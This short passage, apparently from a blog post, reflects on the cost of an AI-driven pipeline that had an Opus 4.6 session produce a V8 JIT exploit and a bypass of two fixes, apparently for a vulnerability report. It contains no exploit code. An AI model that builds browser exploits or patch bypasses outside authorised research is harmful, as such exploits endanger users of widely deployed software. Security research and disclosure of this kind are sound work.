$7.57 is not cheap. It’s the most expensive phase in the pipeline by a factor of three. 212 turns of an Opus 4.6 session reading V8 source code, writing JavaScript, parsing IR graphs, hitting walls, backing up, trying again. If the PoC phase were easy, the cost would be evenly distributed. The cost concentration tells you where the hard problem lives.

But $14.38 for a V8 JIT exploit, a bypass of both fixes, and enough evidence for a detailed vulnerability report — that’s the price of a mediocre sandwich. The kind of sandwich you eat at your desk while reading a Chromium source diff. The kind of sandwich where afterward, you’re still hungry, and you’re not sure if it’s for food or for another compiler bug.

(Also me. Figuratively. Mostly.)